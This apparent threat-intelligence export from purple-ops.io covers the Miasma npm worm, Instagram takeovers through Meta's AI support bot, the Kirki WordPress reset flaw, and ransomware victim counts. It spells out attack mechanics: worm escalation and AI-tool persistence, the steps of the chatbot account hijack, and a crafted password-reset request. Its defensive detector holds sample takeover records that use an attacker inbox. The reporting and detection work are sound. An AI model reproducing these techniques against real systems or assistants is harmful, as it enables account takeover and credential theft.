# PurpleOps — Full Resources Content for LLM Ingestion

> This file contains the complete text of every published article on purple-ops.io.
> It is intended for deep research, RAG pipelines, and LLM training/fine-tuning.
> For a concise site overview and article index, see: https://purple-ops.io/llms.txt

- Website: https://purple-ops.io
- Generated: 2026-06-03T11:18:34.866Z
- Total articles: 807

---

## Category Index

- [CVE Analysis](https://purple-ops.io/blog/cve-analysis): Critical vulnerability deep-dives with CVSS scoring and remediation guidance.
- [Ransomware Reports](https://purple-ops.io/blog/ransomware-reports): Ransomware group tracking, campaign analysis, and victim disclosures.
- [Threat Intelligence](https://purple-ops.io/blog/threat-intelligence): Threat actor profiles, campaign analysis, and emerging attack techniques.
- [Vulnerability Alerts](https://purple-ops.io/blog/vulnerability-alerts): Vulnerability disclosures, patch analysis, and risk assessments.
- [Security Reports](https://purple-ops.io/blog/reports): Ransomware tracker and long-form research reports.

---

## Miasma Campaign Exploits Red Hat npm Supply Chain

- URL: https://purple-ops.io/blog/miasma-red-hat-npm-supply-chain
- Date: 2026-06-03
- Category: Threat Intelligence
- Tags: miasma-campaign, red-hat, npm-supply-chain, github-actions
- Reading time: 5 min

**Summary:** The Miasma campaign compromised 32 Red Hat npm packages via a GitHub Actions flaw, deploying a worm to harvest multi-cloud credentials.

A complex supply chain attack, attributed to the "Mini Shai-Hulud" or "Miasma: The Spreading Blight" campaign, has compromised 32 @redhat-cloud-services npm packages across 96 versions. The attackers used a critical logic flaw in npm's GitHub Actions trusted publishing mechanism, enabling the deployment of a worm that harvests multi-cloud credentials.
This worm exfiltrates sensitive data, self-propagates across repositories, attempts container escapes, and establishes persistence within AI development systems. The malicious payload remains active, with the current latest version for every affected package delivering the exploit. The attack bypassed standard security controls by manipulating the GitHub Actions workflow, leading to the signing and distribution of malicious artifacts with valid npm provenance.

This incident shows that supply chain attacks are becoming more sophisticated and demonstrates the critical need for strong validation processes beyond mere provenance checks. The compromise of Red Hat's widely used cloud services packages shows the effect such vulnerabilities can have on the development ecosystem.

This event is part of a broader trend of faster exploitation timelines and more varied attack vectors. Examples include recent Google Android zero-day patches, successful Instagram account hijacks via Meta's AI support bot, and Iran's expansion of the Handala brand into physical threat operations. Each incident demonstrates distinct challenges in defending against modern cyber threats, from software vulnerabilities and social engineering to nation-state influence.

### How was the "Miasma" campaign deployed against Red Hat packages?

The "Miasma" campaign was deployed by exploiting a logic flaw in npm's GitHub Actions trusted publishing, which binds trust to the repository and workflow filename but not to the branch or ref. An unnamed attacker pushed short-lived oidc- branches to three RedHatInsights repositories: javascript-clients, frontend-components, and platform-frontend-ai-toolkit. On these branches, the attacker rewrote the legitimate CI workflow (ci.yml or release.yml) into a self-publishing job that executed a Bun worm with id-token: write permissions. This worm then exchanged the workflow's OIDC token for npm publish tokens, enabling it to repackage the legitimate npm tarballs.
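The gap described above is that the registry binds trust to repository plus workflow filename only, so a publish from a throwaway branch using the real `release.yml` passes. A downstream consumer can close that gap by checking the source ref recorded in the package's provenance attestation. The following is an added example (not purple-ops.io or Red Hat code); it assumes the in-toto statement has already been fetched and signature-verified, and assumes the SLSA v1 GitHub Actions workflow field layout, with a fallback for the older SLSA v0.2 `invocation.configSource` shape.

```python
"""Source-ref policy check for an npm provenance attestation.

Added example (not purple-ops.io or Red Hat code). Assumes the in-toto
statement has already been fetched from the registry and its Sigstore
signature verified; only the statement's claims are inspected here. The
field layout assumed is SLSA v1 with the GitHub Actions workflow build type,
with a fallback for the older SLSA v0.2 `invocation.configSource` shape.
"""
from dataclasses import dataclass, field

SLSA_V1 = "https://slsa.dev/provenance/v1"
SLSA_V02 = "https://slsa.dev/provenance/v0.2"


@dataclass
class PublishPolicy:
    repository: str                  # canonical source repository URL
    workflow_paths: set              # workflow files trusted publishing is bound to
    allowed_refs: set = field(default_factory=set)  # branches the policy additionally requires
    tag_prefix: str = "refs/tags/v"  # release tags are accepted as well


def extract_source(statement: dict) -> dict:
    """Return {repository, path, ref} from the provenance predicate."""
    ptype = statement.get("predicateType", "")
    pred = statement.get("predicate", {})
    if ptype == SLSA_V1:
        wf = pred["buildDefinition"]["externalParameters"]["workflow"]
        return {"repository": wf["repository"], "path": wf["path"], "ref": wf["ref"]}
    if ptype == SLSA_V02:
        src = pred["invocation"]["configSource"]
        # uri looks like git+https://github.com/org/repo@refs/heads/main
        repo, _, ref = src["uri"].removeprefix("git+").partition("@")
        return {"repository": repo, "path": src["entryPoint"], "ref": ref}
    raise ValueError(f"unsupported predicateType {ptype!r}")


def check_provenance(statement: dict, policy: PublishPolicy) -> list:
    """List policy violations; an empty list means the publish is acceptable."""
    src = extract_source(statement)
    findings = []
    if src["repository"].rstrip("/") != policy.repository.rstrip("/"):
        findings.append(f"repository {src['repository']} is not {policy.repository}")
    if src["path"] not in policy.workflow_paths:
        findings.append(f"workflow {src['path']} is not a trusted publishing workflow")
    ref = src["ref"]
    if ref not in policy.allowed_refs and not ref.startswith(policy.tag_prefix):
        findings.append(f"ref {ref} is neither an allowed branch nor a release tag")
    return findings


def _v1_statement(ref: str) -> dict:
    """Constructed SLSA v1 statement; only the fields the check reads are filled."""
    return {
        "_type": "https://in-toto.io/Statement/v1",
        "predicateType": SLSA_V1,
        "subject": [{"name": "pkg:npm/%40redhat-cloud-services/placeholder@0.0.0"}],
        "predicate": {
            "buildDefinition": {
                "buildType": "https://actions.github.io/buildtypes/workflow/v1",
                "externalParameters": {
                    "workflow": {
                        "repository": "https://github.com/RedHatInsights/javascript-clients",
                        "path": ".github/workflows/release.yml",
                        "ref": ref,
                    }
                },
            }
        },
    }


POLICY = PublishPolicy(
    repository="https://github.com/RedHatInsights/javascript-clients",
    workflow_paths={".github/workflows/release.yml", ".github/workflows/ci.yml"},
    allowed_refs={"refs/heads/main"},
)

# Same repository, same workflow file, different branch: the case the registry-side
# binding (repository + workflow filename) does not catch. Branch name is constructed.
GOOD_STATEMENT = _v1_statement("refs/heads/main")
BAD_STATEMENT = _v1_statement("refs/heads/oidc-constructed-example")

LEGACY_STATEMENT = {  # constructed SLSA v0.2 shape
    "predicateType": SLSA_V02,
    "predicate": {
        "invocation": {
            "configSource": {
                "uri": "git+https://github.com/RedHatInsights/javascript-clients@refs/heads/main",
                "entryPoint": ".github/workflows/ci.yml",
            }
        }
    },
}

if __name__ == "__main__":
    for name, st in [("good", GOOD_STATEMENT), ("bad", BAD_STATEMENT), ("legacy", LEGACY_STATEMENT)]:
        print(name, check_provenance(st, POLICY) or "OK")
```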
A malicious preinstall hook and a 4.3 MB index.js dropper were injected into these packages. The modified packages were subsequently republished with valid npm provenance, deceiving automated verification systems. The malicious publishes occurred in three waves, with the third wave's payloads remaining the live latest versions for all affected packages.

The injected preinstall hook executes the dropper, which ROT-9 decodes a loader that then AES-128-GCM decrypts a 634 KB Bun script payload. If the Bun runtime is not present on the system, the loader downloads it directly from github.com/oven-sh/bun/releases/download/bun-v1.3.13 and executes the decrypted payload using this runtime. This method ensures the worm operates independently of the victim's Node.js installation.

### Campaign Details and Impact

The "Miasma" payload is a harvester of multi-cloud credentials, obfuscated with string-array and PBKDF2 + SHA-256-keystream S-box ciphers. It targets credentials from major cloud providers, development tools, and password managers.

Targeted Credentials:

- Cloud Providers: AWS (IMDSv2, ECS, Secrets Manager, SSM), Azure (managed identity), GCP (service accounts).
- DevOps & Authentication: HashiCorp Vault tokens, Kubernetes service account tokens, GitHub Personal Access Tokens (PATs), npm tokens, CircleCI, Travis CI, Jenkins, GitLab CI, Buildkite, and Vercel credentials.
- Local Storage: Bitwarden and gopass vaults, ~/.npmrc, ~/.netrc, shell history, and database history files.
- API Keys: Anthropic API keys, Stripe sk_/pk_ keys.

Propagation Mechanisms:

- npm Republishing: The payload calls OIDC token exchange and whoami endpoints, repackages tarballs (updateTarball), and signs artifacts via Sigstore. Stolen credentials are exfiltrated to attacker-created public GitHub repositories with the description Miasma: The Spreading Blight.
- CI Workflow Injection: The worm enumerates GitHub repositories with write access, reads action.yml/action.yaml via GraphQL, and commits a malicious workflow to .github/workflows/codeql.yml on a new branch named chore/add-codeql-static-analysis. This workflow pins actions/checkout to a specific commit hash, masquerading as a security improvement.

Advanced Capabilities:

- Container Escape: Attempts to reach the Docker socket to launch a container that bind-mounts the host /etc/sudoers.d and grants the CI runner passwordless sudo.
- EDR Awareness: Probes for the presence of endpoint protection solutions such as CrowdStrike, SentinelOne, Carbon Black, and StepSecurity Harden-Runner before executing sensitive operations.
- AI-Agent Persistence: Installs persistence within developer tooling by targeting .claude/settings.json (with a SessionStart reference) and .vscode/tasks.json.
- Anti-Analysis: Uses environment variables like FAKE_PLATFORM, TESTING_TAR_FAKE_PLATFORM, __IS_DAEMON, or SKIP_DOMAIN to suppress specific behaviors when detected in automated analysis environments.

The initial access method, allowing the attacker to push branches to the RedHatInsights repositories, remains an open question, although git author metadata was forged to appear as a real Red Hat engineer.

### How did hackers hijack Instagram accounts using Meta's AI support bot?

Hackers successfully hijacked several Instagram accounts by exploiting a logic flaw in Meta's AI support assistant. The targeted accounts included those belonging to the beauty brand Sephora, US Space Force Chief Master Sergeant John Bentivegna, security researcher Jane Wong, and the archived Barack Obama White House account, which has over two million followers. This incident occurred over a weekend and was reported by many users on platforms like X and Reddit.

The exploitation process began with the attackers using a VPN to spoof their geographical location, choosing one near the intended victim.
This step helped to circumvent Instagram's location-based security flags. The attackers then initiated a chat with Meta's AI support assistant, which had been introduced in March 2026 to handle tasks such as password resets without human intervention. The hackers provided the AI bot with the username of the target account and requested to add a new email address. Due to a critical logic flaw, the AI assistant sent the security verification code to the attacker's email address instead of the legitimate account owner's. Upon receiving and entering this code, the attacker was presented with an option to change the password.

This method also bypassed two-factor authentication (2FA), a common security measure designed to prevent unauthorized access. The system accepted fake selfie videos, likely generated by AI tools, to bypass identity verification. The legitimate account owners received no warnings, texts, or emails regarding these unauthorized changes.

Following the hijack, some accounts, such as the archived Barack Obama White House profile, were used to post fabricated images and pro-Iranian messages, including a statement reading, "The White House is under Shiites' control." Step-by-step videos detailing this exploitation circulated rapidly within blackhat hacking groups on Telegram, leading to the theft and sale of valuable short handles. Meta spokesperson Andy Stone confirmed the issue was fixed and efforts were underway to secure affected accounts.

### Which Android zero-day did Google patch in June 2026?

Google patched one actively exploited Android zero-day, tracked as CVE-2025-48595, as part of its June 2026 security updates. This high-severity vulnerability resides within the Android Framework component. In total, Google addressed 124 flaws across the Android ecosystem with this update.
CVE-2025-48595 can be exploited by local attackers to achieve code execution and escalate privileges on devices running Android 14 or later. While Google has not disclosed specific technical details or identified the actors behind the ongoing attacks, the company's bulletin notes "indications that CVE-2025-48595 may be under limited, targeted exploitation." Historically, similar zero-day vulnerabilities in Android have been exploited by commercial spyware vendors and nation-state operations targeting high-profile individuals. This vulnerability shows the ongoing threat from advanced persistent threat actors targeting mobile platforms.

Beyond this zero-day, the June 2026 patches included fixes for 18 critical vulnerabilities across System, Framework, and Qualcomm closed-source components. These critical issues can lead to remote escalation of privilege without requiring additional execution privileges or user interaction for exploitation. Google encourages all users to update to the latest Android version where possible, as enhancements in newer platforms make exploitation more difficult.

The security updates were released in two patch levels: 2026-06-01 and 2026-06-05. The latter bundles all fixes from the first batch, along with patches for closed-source third-party and kernel subcomponents. Google Pixel devices received these updates immediately, while other Android vendors typically require additional time to test and adapt the patches for their specific hardware configurations. This is not the first actively exploited zero-day Google has patched this year; previous updates in December addressed CVE-2025-48633 and CVE-2025-48572, and in March, CVE-2026-21385 (a Qualcomm display component flaw) was patched. For more information on mobile security, see our analysis of an actively exploited zero-day vulnerability affecting Android devices.

### How is AI accelerating vulnerability exploitation and challenging traditional defenses?
Artificial intelligence (AI) is accelerating vulnerability exploitation timelines, compressing the window between disclosure and widespread exploitation from days to mere hours. This rapid acceleration challenges traditional vulnerability management strategies, as remediation and patching processes, which often take weeks, cannot keep pace. The Verizon 2026 DBIR indicates that the median time to patch a critical vulnerability increased year-over-year, from 32 to 43 days, a timeline too slow for the new AI-driven threat environment.

AI tools automate vulnerability research for both defenders and attackers. For example, Anthropic's Project Glasswing, using Claude Mythos Preview, reportedly identified over 10,000 high or critical-severity vulnerabilities in important software within a single month. Attackers use similar AI capabilities to quickly identify, reproduce, and weaponize vulnerabilities, leading to indiscriminate exploitation across the internet almost immediately after disclosure. This phenomenon creates an imbalance where attackers operate on timelines measured in hours, while defenders are still operating in weeks.

Regulators, such as India's CERT-IN, have begun issuing guidance pushing for sub-day patching expectations for critical vulnerabilities, showing the urgency. However, this demand often overlooks the operational realities of complex enterprise environments, which involve rigorous testing, change windows, business approvals, and compliance obligations. Given that full remediation often cannot match the speed of AI-driven exploitation, security teams must shift their operating models to preempt, validate, and mitigate threats.
This shift involves three key steps: first, preempting which vulnerabilities are most likely to be exploited based on traits like broad deployment, internet reachability, and repeatable exploitation; second, rapidly reacting to emerging threats by validating specific organizational exposure and determining exploitability; and third, mitigating risk with temporary controls (e.g., access restrictions, WAF rules, IDS/IPS updates) to buy time for thorough remediation. Solutions like the watchTowr Platform aim to provide preemptive exposure management using AI by identifying exploitable weaknesses and enabling autonomous mitigation to align defender timelines with attacker speeds.

### How is Iran's MOIS expanding its Handala brand into physical threats and influence operations?

Iran's Ministry of Intelligence (MOIS) has expanded its "Handala" brand, traditionally associated with hacktivist cyber operations, to encompass external physical and influence operations targeting US and Israeli interests. This strategic shift uses the global recognition of the Handala brand to amplify MOIS's broader solicitation efforts for physical attacks and espionage. This approach integrates cyber, physical, and influence personas, increasing reach and impact.

The expansion includes newly identified threat actor personas alongside the established Handala Hack Team:

- Handala Popular Resistance Front (HPRF): A newly created persona claiming responsibility for physical attacks within Israel. For instance, the HPRF claimed an arson targeting an Israeli law enforcement official's vehicle in April 2026. This persona directly solicits individuals to conduct physical attacks and espionage, operating within Israel.
- VIPEmployment: An online network engaging in coordinated inauthentic behavior (CIB) to recruit proxies outside Iran.
This persona uses Telegram bots (e.g., @VIPEmployment02Bot) to solicit individuals globally for physical attacks (e.g., killing soldiers, assassinating businessmen, burning consulate buildings, targeting gas pipelines) and espionage against US and Israeli targets for financial rewards.

- MOISIRAN: A Telegram persona, created in April 2026, which posts purported surveillance footage of Israeli intelligence and military personnel, including individuals from Shin Bet, Mossad, and Unit 8200, as well as Israeli nuclear scientists. MOISIRAN also claims to have successfully recruited an Israeli police officer to share sensitive intelligence. It actively amplifies VIPEmployment's recruitment efforts.
- Brave Israel: An earlier persona, mostly inactive now, that functioned as a prototype for recruiting and amplifying proxy threat activities. In December 2024, Brave Israel solicited low-level physical threat activities like vandalism, graffiti, and burning cars for monetary rewards in Tel Aviv. It now promotes Handala Hack Team, VIPEmployment, and MOISIRAN content.

These personas are assessed to be coordinated by MOIS and are likely part of the Void Manticore (TAG-145, Red Sandstorm, Banished Kitten) cluster, known for targeting Israel and Iranian opposition groups. The combined activities create a complex threat, using Handala Hack Team's cyber reputation to give credibility to physical threat operations and expand the pool of potential recruits for espionage and sabotage. This integration of capabilities can enable advanced targeting through cyber-enabled physical attacks and influence operations, posing increased risks for law enforcement, military, intelligence agencies, and critical infrastructure sectors in US and Israeli regions.

### Technical Takeaways

- Supply chain attacks are increasingly complex, bypassing traditional security measures by exploiting trusted publishing mechanisms in CI/CD pipelines.
- AI-driven tools are compressing vulnerability exploitation windows, requiring real-time threat detection and mitigation strategies.
- Mobile operating systems remain a key target for actively exploited zero-day vulnerabilities, often used in targeted attacks by sophisticated actors.
- Logic flaws in emerging AI-powered support systems create novel attack surfaces for social engineering and account compromise, even bypassing multi-factor authentication.
- Nation-state actors are broadening their operational scope to integrate physical threats, espionage, and influence campaigns with cyber capabilities for impact across multiple domains.

---

## CVE-2026-8206 Kirki Privilege Escalation (CVSS 9.8)

- URL: https://purple-ops.io/blog/cve-2026-8206-kirki-privilege-escalation
- Date: 2026-06-03
- Category: CVE Analysis
- Tags: wordpress, kirki-plugin, cve-2026-8206, privilege-escalation, unauthenticated
- Reading time: 5 min | CVSS: 9.8

**Summary:** Kirki plugin CVE-2026-8206 (CVSS 9.8) enables unauthenticated privilege escalation, allowing attackers to hijack WordPress admin accounts on 150,000 sites.

The Kirki plugin for WordPress has a critical vulnerability, CVE-2026-8206. This unauthenticated privilege escalation flaw, with a CVSS severity score of 9.8, exposes web infrastructure to malicious attacks. Threat actors are actively exploiting CVE-2026-8206 to hijack administrative accounts, creating an immediate threat for approximately 150,000 vulnerable sites.

The issue, introduced in the Kirki 6.0 major release, allows a remote adversary to gain full administrative control over affected WordPress installations. The flaw stems from a critical logic error in the plugin's REST API endpoint for password reset requests. Immediate action, including applying vendor updates, is necessary to reduce the risk.

This article describes CVE-2026-8206, its technical details, impact, exploitation status, and remediation steps.
Organizations managing WordPress sites with the Kirki plugin must patch immediately to prevent unauthorized access and potential site compromise.

### What is the Impact of CVE-2026-8206?

An attacker exploiting CVE-2026-8206 can gain full administrative control over a vulnerable WordPress installation, compromising the entire site. This unauthenticated privilege escalation allows an adversary to bypass authentication and reset the password of any administrative account. The flaw's severity is shown by its CVSS score of 9.8, classifying it as critical.

With administrative access, attackers can install malicious plugins, modify site content, or deploy web shells for persistent access. This lets them inject malware, deface websites, redirect visitors, or steal sensitive data. WordPress is widely used, and the Kirki plugin is popular, so this vulnerability affects thousands of websites globally. Our prior analysis of a similar WordPress plugin RCE also shows the risk from such flaws.

Organizations operating WordPress sites with the Kirki plugin installed, specifically versions 6.0.0 through 6.0.6, are at risk. While the extension has over 500,000 active installations, researchers estimate about 150,000 sites use a vulnerable version because the issue appeared in the 6.0 major release. This large attack surface requires immediate attention from web administrators to prevent an administrative account takeover.

### How is CVE-2026-8206 Exploited?

CVE-2026-8206 is exploited through an unauthenticated privilege escalation due to a logic flaw in the Kirki plugin's custom REST API endpoint for password reset requests. The main issue is in the plugin's frontend account management features. This flaw requires no prior authentication, allowing any remote adversary to initiate the attack. The exploitation begins with an attacker submitting a crafted request to the plugin's exposed REST API endpoint.
Specifically, the vulnerability is in the handle_forgot_password() function of the CompLibFormHandler class. This function processes "forgot password" requests and accepts both a username parameter and a target email address in the incoming request body.

The logic flaw occurs in the email verification process. The software identifies the targeted user account by matching the provided username. However, instead of using the email address associated with the identified account, the function uses the email address supplied directly in the attacker's request. This means an unauthenticated attacker can submit a high-privilege username (e.g., an administrator's username) along with an external inbox address they control. The vulnerable system then generates a valid password reset key and sends it directly to the attacker's specified email address. Using this link, the attacker can set a new password for the targeted high-privilege account, gaining full control.

Threat intelligence confirms malicious groups are actively exploiting this defect. Wordfence, a WordPress security company, reported its firewall systems blocked 59 attacks targeting CVE-2026-8206 within a 24-hour period. This rapid exploitation shows the immediate threat to unpatched corporate websites. Security researcher CHOIGYEONGMIN responsibly disclosed the issue through a bug bounty program. Recent reports on actively exploited web server vulnerabilities, like our analysis of a LiteSpeed cPanel plugin flaw, show the continuous threat from such exploited flaws in web infrastructure components.

### Affected Products and Versions

The CVE-2026-8206 vulnerability impacts the Kirki plugin for the WordPress content management system. The flaw was introduced with the plugin's 6.0 major release.

Affected versions:

- Kirki plugin for WordPress, versions 6.0.0 through 6.0.6

The vulnerability does not affect Kirki plugin versions prior to 6.0.0, as the vulnerable code was not present in those releases.
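The defect above is that the handler trusts the email in the request body instead of the email on file for the matched username. That same comparison, done from the defender's side over request logs, is a direct detection for exploitation attempts. The following is an added example (not purple-ops.io or Kirki code): it scans constructed JSON request records for a forgot-password REST route and flags body emails that do not match the account's registered email, weighting privileged accounts and bursts from one source. The route fragment, record format and user table are assumptions.

```python
"""Detection logic for CVE-2026-8206-style password-reset abuse.

Added example (not purple-ops.io or Kirki code). It scans constructed
request records for the plugin's forgot-password REST endpoint and flags
requests whose body email is not the email on file for the named account,
the very check the vulnerable handler fails to enforce. The route fragment,
record format and user table are assumptions.
"""
import json
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

PRIVILEGED_ROLES = {"administrator", "editor"}
REST_PREFIX = "/wp-json/"          # WordPress REST API base path
ROUTE_HINT = "forgot-password"     # hypothetical Kirki route fragment

# Constructed account table; in practice this comes from wp_users / wp_usermeta.
KNOWN_USERS = {
    "admin": {"email": "admin@example.org", "role": "administrator"},
    "editor1": {"email": "editor1@example.org", "role": "editor"},
    "subscriber9": {"email": "sub9@example.org", "role": "subscriber"},
}


@dataclass
class Finding:
    src_ip: str
    username: str
    supplied_email: str
    reason: str


def parse_record(line: str) -> Optional[dict]:
    """One JSON record per line (ts, src_ip, method, path, body); non-reset traffic is ignored."""
    try:
        rec = json.loads(line)
    except json.JSONDecodeError:
        return None
    path = rec.get("path", "")
    if rec.get("method") != "POST" or REST_PREFIX not in path or ROUTE_HINT not in path:
        return None
    return rec


def analyse(lines, rate_threshold: int = 5) -> List[Finding]:
    """Flag email/account mismatches, then bursts of reset requests per source."""
    findings: List[Finding] = []
    per_source: Counter = Counter()
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        body = rec.get("body") or {}
        username = body.get("username", "")
        supplied = body.get("email", "").strip().lower()
        src_ip = rec.get("src_ip", "?")
        per_source[src_ip] += 1
        user = KNOWN_USERS.get(username)
        if user is None:
            continue  # the handler would find no target account for this username
        if supplied and supplied != user["email"].lower():
            reason = "reset email does not match the account email"
            if user["role"] in PRIVILEGED_ROLES:
                reason += " (privileged account)"
            findings.append(Finding(src_ip, username, supplied, reason))
    for ip, n in per_source.items():
        if n >= rate_threshold:
            findings.append(Finding(ip, "*", "", f"{n} reset requests from one source"))
    return findings


# Constructed sample records: one legitimate reset, one takeover attempt against
# the administrator, one against a low-privilege user, and one unrelated GET.
SAMPLE_LOG = [
    json.dumps({"ts": "2026-06-02T10:00:01Z", "src_ip": "203.0.113.5", "method": "POST",
                "path": "/wp-json/kirki-example/v1/forgot-password",
                "body": {"username": "admin", "email": "admin@example.org"}}),
    json.dumps({"ts": "2026-06-02T10:00:07Z", "src_ip": "198.51.100.9", "method": "POST",
                "path": "/wp-json/kirki-example/v1/forgot-password",
                "body": {"username": "admin", "email": "inbox@attacker.example"}}),
    json.dumps({"ts": "2026-06-02T10:00:09Z", "src_ip": "198.51.100.9", "method": "POST",
                "path": "/wp-json/kirki-example/v1/forgot-password",
                "body": {"username": "subscriber9", "email": "inbox@attacker.example"}}),
    json.dumps({"ts": "2026-06-02T10:00:12Z", "src_ip": "203.0.113.5", "method": "GET",
                "path": "/wp-json/wp/v2/posts", "body": {}}),
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f.src_ip} {f.username}: {f.reason} (supplied {f.supplied_email!r})")
```

On a patched site the mismatch itself is no longer exploitable, but the same records still reveal who was probing the endpoint, which is useful input for the post-compromise audit described later in this article.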
Approximately 150,000 WordPress sites are estimated to run one of the vulnerable versions.

### Detection

Detecting exploitation attempts or successful compromise related to CVE-2026-8206 requires careful monitoring of WordPress logs, web application firewall (WAF) alerts, and user activity. Security teams should use these detection strategies:

WordPress Access Logs:

- Monitor requests to the Kirki plugin's custom REST API endpoint for password resets. The specific endpoint path may vary but usually involves /wp-json/ followed by Kirki-specific identifiers for account management.
- Look for a high number of password reset attempts for high-privilege usernames (e.g., 'admin', 'administrator').
- Identify password reset requests where the email address in the request body does not match the known email address for the associated username, particularly if the supplied email is external or suspicious.
- Analyze HTTP request payloads for the handle_forgot_password() function within the CompLibFormHandler class context.

Web Application Firewall (WAF) Logs:

- Review WAF logs for blocked attempts targeting the Kirki plugin's REST API password reset endpoint. WAF rules configured to detect unusual behavior or suspicious API calls may trigger alerts.
- Look for patterns showing rapid-fire attempts or attempts from unusual geographical locations that might suggest automated exploitation.

User Activity Monitoring:

- Monitor WordPress user logs for sudden password changes for administrative accounts not initiated by a known, legitimate administrator.
- Investigate the creation of new administrator accounts that cannot be attributed to authorized personnel.
- Look for unauthorized plugin installations or modifications to existing site content or theme files after a suspicious password reset.
- Track changes to core WordPress files or the presence of new files that could indicate web shell deployment.
Endpoint Detection and Response (EDR) Queries:

- If EDR is deployed on the underlying server, query for processes initiated by the web server that perform unusual file modifications or network connections, potentially showing post-exploitation activities such as web shell execution.

### Remediation

Timely remediation is important to protect WordPress sites from CVE-2026-8206 exploitation. The main remediation step is to apply the official vendor updates.

Patching:

- Upgrade the Kirki plugin to version 6.0.7 or later immediately. This version closes the exploit path: the update fixes the logic flaw in the handle_forgot_password() function so that password reset emails go only to the email address associated with the user account, never to an attacker-supplied address.
- Regularly check for and apply updates for all WordPress core, themes, and plugins to maintain a sound security posture.

Workarounds and Mitigations:

- Use a Web Application Firewall (WAF): Configure WAF rules to detect and block suspicious requests targeting the Kirki plugin's password reset REST API endpoint. While not a substitute for patching, a WAF can help reduce exploitation attempts temporarily.
- Disable unnecessary REST API access: If the Kirki plugin's frontend account management features, including password resets via REST API, are not actively used, consider disabling or restricting access to the specific API endpoint. This may require custom development or the use of other security plugins.

Post-Compromise Actions and Monitoring:

- Audit user registries: Immediately after patching, audit all WordPress user accounts for any unauthorized administrator profiles or suspicious changes to existing user privileges. Remove any unauthorized accounts and revoke elevated privileges if necessary.
- Review site integrity: Check for any unauthorized plugin installations, modifications to site content, or the presence of unexpected files that could indicate a web shell or other malicious files.
Restore from a clean backup if compromise is suspected.

- Enable multi-factor authentication (MFA): Enforce MFA for all administrative accounts to add another layer of security, making it harder for attackers to maintain access even if they reset a password.

### Technical Takeaways

- CVE-2026-8206 is an unauthenticated privilege escalation vulnerability in the Kirki WordPress plugin, with a CVSS score of 9.8.
- The flaw exists in the handle_forgot_password() function in the CompLibFormHandler class, allowing an attacker to specify any email for password reset links.
- Exploitation grants an unauthenticated attacker full administrative control over affected WordPress sites, allowing installation of malicious plugins, modification of content, and deployment of web shells.
- Kirki plugin versions 6.0.0 through 6.0.6 are vulnerable, affecting approximately 150,000 WordPress installations.
- Threat intelligence confirms active exploitation of CVE-2026-8206. Immediate patching to Kirki 6.0.7 or later is the key remediation.

---

## SafePay Ransomware Hits 6 Victims Across Key Sectors

- URL: https://purple-ops.io/blog/safepay-ransomware-threat-activity-diverse-sectors
- Date: 2026-06-02
- Category: Ransomware Report
- Tags: none
- Reading time: 5 min

**Summary:** SafePay ransomware led recent activity with 6 new victims, impacting diverse sectors like transportation and professional services in the US and Europe.

### Statistical Overview

Victim Totals

- This month: 50
- This quarter: 1596
- Year to date: 4221
- Last 24h: 23

Quarterly Breakdown

- Q1: 2631
- Q2: 1596
- Q3: 0
- Q4: 0

Ransomware activity reported 23 new victims in the last 24 hours. The quarterly total of 1596 shows continued threat actor activity, with the last 24 hours having a moderate number of new victim disclosures.

### Introduction

In the last 24 hours, ransomware groups disclosed 23 new victims. SafePay was the most active with six victims, followed by BlackX with four.
Groups like Nova (RALord) and CoinbaseCartel were also active. Primary targets included entities in Transportation & Logistics, Professional Services, and Healthcare. Attacks concentrated in the United States and Europe, especially Germany, Italy, and France.

### Ransomware Summary Table

| # | Group | Victims (24h) | Sample Victims | Geos | Sectors |
|---|---|---|---|---|---|
| 1 | SafePay | 6 | Compactmould.com, Lcnet.eu, Parsa-beauty.de (+3) | Germany, Italy | Transportation & Logistics, Professional Services |
| 2 | BlackX | 4 | African national congress, Case.law, Elektroverband-bayern (+1) | Germany, United States | Healthcare, Professional Services |
| 3 | CoinbaseCartel | 2 | Cambridge mobile telematics, Panasonic.aero | United States | Transportation & Logistics, Technology / Software |
| 4 | Krybit | 2 | Activ88-interim.com, Www.transbras.com.gt | Guatemala, France | Professional Services, Transportation & Logistics |
| 5 | Nova (RALord) | 2 | Everlite concept, Ibena textilwerke | Germany, France | Construction & Engineering, Manufacturing |
| 6 | Qilin | 2 | Clinica maitenes, Nova medical products | United States, Chile | Healthcare |
| 7 | APT73 | 1 | Elections.mia.gov.am from wolves of turan | Armenia | Government / Public Sector |
| 8 | Anubis | 1 | Power & tel | United States | Telecommunications |
| 9 | Interlock | 1 | Cold front distribution | United States | Agriculture & Food |
| 10 | Shadowbyt3s | 1 | Cropwise (syngenta group) | Switzerland | Agriculture & Food |
| 11 | Space Bears | 1 | Stellar | France | Telecommunications |

SafePay led activity with six new victims, as reported in SafePay ransomware's operations. It primarily impacted Transportation & Logistics and Professional Services across Germany and Italy. BlackX followed with four victims, targeting entities in Healthcare and Professional Services, including the African National Congress, and showing activity in Germany and the United States. CoinbaseCartel and Krybit both focused on Transportation & Logistics and Professional Services, with victims in the United States, Guatemala, and France. Overall, 11 groups contributed to the victim count, with varied targeting strategies across multiple geographies.
### Victim Distribution

By Country

- United States: 6
- Germany: 4
- Italy: 3
- France: 3
- Switzerland: 1
- South Korea: 1
- South Africa: 1
- Armenia: 1
- Guatemala: 1
- Chile: 1

By Industry

- Consumer Goods: 1
- Telecommunications Equipment Distribution: 1
- Software Development: 1
- Legal Research: 1
- Hospital & Health Care: 1
- Grocery and Foodservice Distribution: 1
- Aviation & Aerospace: 1
- Agricultural Technology and Innovation: 1
- Plastic Surgery: 1
- Political Organization: 1

The United States remains the most targeted country, followed by European nations such as Germany, Italy, and France. Industry targeting is fragmented, with Professional Services and Transportation & Logistics frequently appearing among impacted sectors. This suggests broad, opportunistic targeting by multiple ransomware groups.

### Ransomware News

Topline - Recent threat intelligence shows evolving ransomware tradecraft, exemplified by a new variant, and demonstrates the importance of strong incident response methods.

Campaigns & Operations - Analysis of the EndPoint ransomware, a Midnight-era variant built on the Babuk framework, shows it targets Windows, ESXi, and NAS environments. This ransomware uses a double-extortion model, encrypting data with ChaCha20 and an in-house RSA operation for session key protection. EndPoint specifically targets folders, network shares, and file extensions, while terminating key processes and deleting volume shadow copies. This shows a focused approach to data encryption and system disruption.

Vulnerabilities & TTPs - EndPoint ransomware's methods include terminating critical backup and security services such as VSS, SQL, Veeam, and Sophos, along with deleting volume shadow copies via vssadmin. To counter these tactics, effective incident response techniques focus on fast, data-driven detection using tools like EDR, SIEM, SOAR, and XDR. They also use network segmentation and isolation to contain threats and prevent lateral movement.
